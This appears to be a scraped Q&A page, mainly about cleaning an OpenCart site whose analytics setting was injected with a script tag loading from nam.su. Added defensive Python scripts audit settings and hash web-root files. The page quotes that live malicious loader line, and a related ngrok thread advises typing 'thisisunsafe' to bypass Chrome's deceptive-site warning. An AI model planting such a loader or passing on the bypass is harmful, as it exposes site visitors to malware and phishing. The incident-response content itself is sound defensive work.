Can't remove a "security" folder from the server via FTP - opencart

I currently host a website on Hostgator. My site redirects to an Adobe Flash Update automatically. I contacted support at Hostgator and they did not want to help; they said I need to contact SiteLock to remove the malware that is causing the redirection.
I FTP'd into the server and found a ".security" folder which seems to be the cause of the problem. It has some zip files and other PHP files. I cannot change its permissions or delete it.
Does anyone know how I can remove this malware from the server? Any help is welcome, thank you.

In reference to my last issue with Hostgator and a malware site.
The site was running OpenCart and I found that the origin of the problem was within the back end of OpenCart, specifically under Settings > Server > Google Analytics Code, with a suspicious domain in the text area.
```html
<!-- startgoogle -->
<script src="http://nam.su/google2"></script>
<!-- endgoogle --></head>
```
Whoever did this to the site was able to log in and manually enter the script in the poorly escaped and sanitized text area, making a mess. I just hope that I don't get banned from this site for publishing the link above, but I think that someone may come across a similar problem and find this 'honest' mistake useful. I am also interested in what's wrong with OpenCart's textarea.
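The injected Google Analytics snippet above is a setting value, not a file, so a file scan will not find it. The following is an added example (not code from the original post or from the OpenCart project) that audits setting values for `<script>` tags loading from hosts outside an allow-list, or inline scripts carrying common obfuscation markers. The sample rows are constructed here to mirror the post; the setting-table layout (a `key`/`value` pair per row, with the analytics snippet stored under `config_google_analytics`) and the allowed host list are assumptions a practitioner would adjust for their own install.

```python
"""
Added example: flag <script> tags in OpenCart setting values that load from
unexpected hosts or carry inline obfuscation. Not from the original post or
from OpenCart itself; table/column names and the allow-list are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a legitimate Google Analytics / Tag Manager snippet loads from (assumption).
ALLOWED_SCRIPT_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com"}

# Tokens that rarely appear in a hand-pasted analytics snippet but are common
# in injected droppers.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")


class _ScriptCollector(HTMLParser):
    """Collect src attributes and inline bodies of <script> tags.

    HTMLParser tolerates the stray </head> seen in the post; it will not raise.
    """

    def __init__(self):
        super().__init__()
        self.srcs = []      # external script URLs
        self.inline = []    # inline script bodies
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value.strip())

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def script_host(src):
    """Hostname of a script src, or None for relative paths."""
    if src.startswith("//"):          # protocol-relative URLs need a scheme to parse
        src = "https:" + src
    host = urlparse(src).hostname
    return host.lower() if host else None


def suspicious_scripts(html_fragment, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return human-readable findings for one setting value ([] if clean)."""
    parser = _ScriptCollector()
    parser.feed(html_fragment)
    findings = []
    for src in parser.srcs:
        host = script_host(src)
        # Relative srcs are flagged too: an attacker who can write files (see the
        # x76x09.php thread further down) can point the tag at a local dropper.
        if host not in allowed:
            findings.append("external script from " + (host if host else repr(src)))
    for body in parser.inline:
        if any(marker in body for marker in OBFUSCATION_MARKERS):
            findings.append("inline script with obfuscation markers")
    return findings


def audit_settings(rows, allowed=ALLOWED_SCRIPT_HOSTS):
    """rows: iterable of (key, value) pairs from the setting table.

    Returns {key: [findings]} for every entry that embeds a suspicious script.
    """
    report = {}
    for key, value in rows:
        found = suspicious_scripts(value or "", allowed)
        if found:
            report[key] = found
    return report


# Constructed sample rows: a plain setting, the injected snippet from the post,
# and a benign Tag Manager snippet under a hypothetical key for comparison.
SAMPLE_ROWS = [
    ("config_name", "My Shop"),
    ("config_google_analytics",
     '<!-- startgoogle -->\n<script src="http://nam.su/google2"></script>\n'
     '<!-- endgoogle --></head>'),
    ("config_tag_manager_example",
     '<script async src="https://www.googletagmanager.com/gtag/js?id=UA-0000"></script>'),
]

if __name__ == "__main__":
    for key, findings in audit_settings(SAMPLE_ROWS).items():
        print(f"{key}: {'; '.join(findings)}")
```

To run this against a live store, feed `audit_settings` the rows of `SELECT key, value FROM setting` (table prefix and serialization vary by OpenCart version) and review every hit; the allow-list is deliberately strict, so a legitimate non-Google tag will also be reported and should be added to it rather than ignored.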

Related

Deceptive site ahead in Google Chrome when I tried to open the ngrok URL

Recently I came across this issue when I exposed my port via ngrok.
I simply forwarded it, but when I tried to open the ngrok URL I got a Deceptive site ahead warning.
Here is the image of the warning.
It was a Django server with GraphQL and I wanted to test GraphiQL. (This point might not be necessary for the reader, but more info is always better than no info.)
So the solution I found was to click on the red empty area and type "thisisunsafe" (without quotes, of course).
PS: I searched for the solution but couldn't find any; I hope this will help others who are looking for the same.
Another workaround that I found is using that same URL in an incognito window. I'm not sure why the security is more lax there...but it works.

Redirect wrong URL/path DigitalOcean Spaces

I'm using DigitalOcean Spaces CDN to host a static website; so far so good. If I hit my index.html everything is working as expected.
The problem I'm facing now is that if the user hits any path that is not index.html, they get back an Access Denied error.
I've looked inside the DigitalOcean Spaces CDN settings and found nothing about redirecting on a wrong URL/path.
Is there a way I could achieve that?
Would I need a service like Cloudflare in front of my CDN?
Sorry, but looking around on the web got me nowhere so far.
You need to check a couple of things:
You need to make all HTML files public
Enable File Listing
DO Spaces does not support static page hosting (if someone visits your domain, you can't redirect from "/" to "/index.html"). IMO that's a big no-no. If you want free static hosting, just use https://www.netlify.com/ or git hosts (GitHub and GitLab).

CF11 LocalHost 404 Issue

I've just recently installed CF11 on a new machine, but I'm encountering the below issue when trying to navigate to the localhost directory in a browser.
On my previous machine, which was using CF10, I was able to get the directory listings and navigate through folders to specific pages, so is it some setting that I am missing?
I can navigate to CFAdmin okay and have added a whole range of aliases in my server.xml file which I can navigate to, as well as adding the CFIDE and WEB-INF ones.
As an aside, I also seem to get that silly 404 badge in front of CF's debug output when I try to navigate to a page that doesn't yet exist. Is there a way to switch it off?
If you need more details let me know.
Thanks in advance

CF10 Developer on IIS 7.5 / Win7 - CFM files run OK, but can't see .GIFs

Can anyone help with this strange problem?
I have just installed CF10 Developer on Win7, which is using IIS 7.5.
Installation went smoothly, and I can browse .cfm files and connect to datasources no problem, BUT: even though I can browse all my local CF sites, none of the sites will display images or styles from external .CSS files.
So, I get the site, content from the database, and all the functionality of CFM files being parsed OK, but no styles and no images.
If I browse directly (pasting the file path in the browser) to one of the images I get a 404 error - file not found - even though the .gif file does indeed exist in the directory.
So, basically, I can run CFM files, and browse a local site built in coldfusion, but none of the images or externally referenced css files will be "found" by the browser/IIS.
Can anyone help?
Thanks in advance if someone can.
Sounds like an issue with those MIME types; please see the following for information on installing the static content role in IIS and enabling those MIME types to be served.
No Mime Types Option in IIS 7
Be sure to enable static content in IIS 7.
Had two occurrences of this problem lately.
See here:
http://weblogs.asp.net/anasghanem/archive/2008/05/23/don-t-forget-to-check-quot-static-content-service-quot-in-iis7-installation.aspx
Try restarting the IIS server. Close all browsers and restart.
You need to determine if it is a CF issue or an IIS issue. Try the following:
Check to see if this is an issue with images not being served vs. broken paths to the images. There may be CFML code that is creating links to invalid locations.
If the locations are valid then it would be an issue with IIS not serving image files.
Also check to see if there is a similar issue with JPEG and PNG files. If JPEGs and PNGs show up, this suggests an IIS issue.
Also try creating a simple HTML page that has an image on it. If the image displays, this suggests a CF issue.

Is it possible to be attacked with XSS on a static page (i.e. without PHP)?

A client I'm working for has mysteriously ended up with some malicious scripting going on on their site. I'm a little baffled however because the site is static and not dynamically generated - no PHP, Rails, etc. At the bottom of the page though, somebody opened a new tag and a script. When I opened the file on the webserver and stripped the malicious stuff and re-uploaded, it was still there. How is this possible? And more importantly, how can I combat this?
EDIT:
To make it weirder, I just noticed the script only shows up in the source if the page is accessed directly as 'domain.com/index.html' but not as just 'domain.com'.
EDIT2:
At any rate, I found some PHP file (x76x09.php) sitting on the web server that must have been updating the HTML file despite my attempts to strip it of the script. I'm currently in the clear, but I do have to do some work to make sure rogue files don't just appear again and cause problems. If anyone has any suggestions on this, feel free to leave a comment; otherwise thanks for the help everyone! It was very much appreciated!
No, it's not possible unless someone has access to your files. So in your case someone has access to your files.
Edit: It's best if you ask on serverfault.com regarding what to do in case the server is compromised, but:
change your shell passwords
have a look at /var/log/messages for login attempts
finger root
have a look at last modification time of those files
There is also a high probability that the files were altered via HTTP by using a vulnerability in a software component you use together with the static files.
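The "look at the last modification time of those files" step above catches a single edit but not a dropper such as the x76x09.php mentioned in the question, which rewrites index.html on every request. What follows is an added example (not code from the thread or from any hosting provider) of a SHA-256 manifest of the web root diffed against a later scan, so that added, removed and changed files surface, with any newly added server-side script on a supposedly static site called out separately. The demo web root, file names and contents are constructed here; the list of script extensions is an assumption to extend for your stack.

```python
"""
Added example: baseline a static web root with SHA-256 hashes and report
what changed on a later scan. Not code from the original thread; the demo
directory, file names and the script-extension list are constructed/assumed.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# Anything a static site should never gain. Extend for your stack (assumption).
SCRIPT_SUFFIXES = {".php", ".phtml", ".php5", ".phar", ".cgi", ".pl", ".py"}


def hash_file(path, chunk=65536):
    """SHA-256 of a file, streamed so large assets don't load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map of POSIX-style relative path -> SHA-256 for every regular file under root."""
    root = Path(root)
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue  # symlinks pointing outside the root are a separate audit
            manifest[p.relative_to(root).as_posix()] = hash_file(p)
    return manifest


def diff_manifest(baseline, current):
    """Compare two manifests; returns sorted lists per change class."""
    base_keys, cur_keys = set(baseline), set(current)
    added = sorted(cur_keys - base_keys)
    removed = sorted(base_keys - cur_keys)
    modified = sorted(p for p in base_keys & cur_keys if baseline[p] != current[p])
    # On a static site a brand-new .php file is an indicator on its own,
    # whatever else changed.
    new_scripts = [p for p in added if Path(p).suffix.lower() in SCRIPT_SUFFIXES]
    return {"added": added, "removed": removed,
            "modified": modified, "new_scripts": new_scripts}


def demo():
    """Construct a tiny web root, baseline it, then simulate the compromise
    described in the question (index.html edited, a PHP dropper added)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.html").write_text("<html><body>hello</body></html>\n")
        (root / "css").mkdir()
        (root / "css" / "site.css").write_text("body { margin: 0 }\n")
        baseline = build_manifest(root)

        # Simulated attacker activity (constructed, not a real payload).
        (root / "index.html").write_text(
            "<html><body>hello<script src=\"http://example.invalid/x.js\"></script></body></html>\n")
        (root / "x76x09.php").write_text("<?php /* constructed stand-in for the dropper */ ?>\n")

        return diff_manifest(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In practice, store the baseline manifest somewhere the web server's user cannot write (off-box or at least outside the document root), regenerate it only after a deliberate deploy, and run the diff from cron; a hit in `new_scripts` or an unexpected `modified` entry on a static site is a stronger signal than any mtime, since a dropper can reset timestamps but cannot make the content hash match.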
To the point about the site not having pages executing on the server, XSS is absolutely still possible using a DOM based attack. Usually this will relate to JavaScript execution outputting content to the page. Just last week WhiteHat Security had an XSS vulnerability identified on a purely “static” page.
It may well be that the attack vector relates to file level access but I suggest it’s also worthwhile taking a look at what’s going on JS wise.
You should probably talk to your hosting company about this. Also, check that your file permissions aren't more lenient than they should be for your particular environment.
That's happened to me before - this happens if they get your FTP details. So whoever did it obviously got hold of your FTP details somehow.
Best thing to do is change your password and contact your webhosting company to figure out a better solution.
Unfortunately, FTP isn't the most secure...